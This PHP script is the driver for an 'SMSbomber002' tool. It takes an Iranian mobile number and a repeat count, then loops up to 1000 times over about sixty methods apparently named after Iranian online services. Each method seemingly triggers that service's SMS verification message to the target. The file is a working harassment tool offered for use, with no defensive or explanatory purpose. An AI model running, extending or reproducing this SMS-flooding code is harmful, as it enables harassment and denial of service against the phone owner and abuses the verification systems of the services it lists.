<?php
require "SMSbomber002.php";

function startsb002($tnum)
{
    if (preg_match("/^09[0-9]{9}$/", $tnum)) {
        $sb = new smsbomber002($tnum);
        $sb->webpoosh();
        echo "sent webpoosh! \n";
        $sb->inchand();
        echo "sent inchand! \n";
        $sb->mobilexpress();
        echo "sent mobilexpress! \n";
        $sb->send_sms_okcs();
        echo "sent send_sms_okcs! \n";
        $sb->bargheman();
        echo "sent bargheman! \n";
        $sb->vitrin();
        echo "sent vitrin! \n";
        $sb->kif();
        echo "sent 123kif! \n";
        $sb->Szarinpall();
        echo "sent Szarinpall! \n";
        $sb->gruccia();
        echo "sent gruccia! \n";
        $sb->mashadleather();
        echo "sent mashadleather! \n";
        $sb->Sbrozmart();
        echo "sent Sbrozmart! \n";
        $sb->Ssabziman();
        echo "sent Ssabziman! \n";
        $sb->Sirantiket();
        echo "sent Sirantiket! \n";
        $sb->Ssinamatiket();
        echo "sent Ssinamatiket! \n";
        $sb->mrbilit();
        echo "sent mrbilit! \n";
        $sb->Sshab();
        echo "sent Sshab! \n";
        $sb->narsisbeauty();
        echo "sent narsisbeauty! \n";
        $sb->Saghayedaro();
        echo "sent Saghayedaro! \n";
        $sb->hoomangold();
        echo "sent hoomangold! \n";
        $sb->S2nabsh();
        echo "sent S2nabsh! \n";
        $sb->Sshabesh();
        echo "sent  Sshabesh! \n";
        $sb->Skilid();
        echo "sent Skilid! \n";
        $sb->Ssheypoor();
        echo "sent Ssheypoor! \n";
        $sb->Sbehtarino();
        echo "sent Sbehtarino! \n";
        $sb->Sbanimode();
        echo "sent Sbanimode! \n";
        $sb->Strob();
        echo "sent Strob! \n";
        $sb->davidjonesonline();
        echo "sent davidjonesonline! \n";
        $sb->Sgap();
        echo "sent Sgap! \n";
        $sb->Ssnappdoctor();
        echo "sent Ssnappdoctor! \n";
        $sb->mofidteb();
        echo "sent mofidteb! \n";
        $sb->Schamedon();
        echo "sent Schamedon! \n";
        $sb->melipayamak();
        echo "sent Schamedon! \n";
        $sb->Ssnapptrip();
        echo "sent Ssnapptrip! \n";
        $sb->Spezeshket();
        echo "sent Spezeshket! \n";
        $sb->Ssibche();
        echo "sent Ssibche! \n";
        $sb->Salibaba();
        echo "sent Salibaba! \n";
        $sb->Ssnappmarket();
        echo "sent Ssnappmarket! \n";
        $sb->Sbasalam();
        echo "sent Sbasalam! \n";
        $sb->Ssnapp();
        echo "sent Ssnapp! \n";
        $sb->ttbol();
        echo "sent ttbol! \n";
        $sb->Sbimecom();
        echo "sent Sbimecom! \n";
        $sb->Sdigikala();
        echo "sent Sdigikala! \n";
        $sb->Sbazzar();
        echo "sent Sbazzar! \n";
        $sb->Sezpay();
        echo "sent Sezpay! \n";
        $sb->Snamava();
        echo "sent Snamava! \n";
        $sb->sensishopping();
        echo "sent sensishopping! \n";
        $sb->Sdivar();
        echo "sent Sdivar! \n";
        $sb->Salopeyk();
        echo "sent Salopeyk! \n";
        $sb->Sbimebazar();
        echo "sent Sbimebazar! \n";
        $sb->masterkala();
        echo "sent masterkala! \n";
        $sb->stapsi();
        echo "sent stapsi! \n";
        $sb->joordaroo();
        echo "sent joordaroo! \n";
        $sb->basalam();
        echo "sent basalam! \n";
        $sb->xiaomixiaomi();
        echo "sent xiaomixiaomi! \n";
        $sb->lavinbg();
        echo "sent lavinbg! \n";
        $sb->skmei();
        echo "sent skmeiirnan! \n";
        $sb->shimashoes();
        echo "sent skmeiirnan! \n";
        $sb->avinehclinic();
        echo "sent avineh.clinic! \n";
        $sb->nobat();
        echo "sent nobat! \n";
        $sb->kapanigold();
        echo "sent kapanigold! \n";

        return "round finished !";
    } else {
        return "The number is Not Valid!";
    }
}
echo "wellcome to SMSbomber002 (modeyfiy  By khaled salhi) \n";
$gnumber = readline("Enter phone number :");
$gc = readline("enter number for while (1-1000) :");
do {
    echo startsb002($gnumber);
    $gc--;
    echo "\n sleep 20 sec :/";
    sleep(20);
} while ($gc > 0);
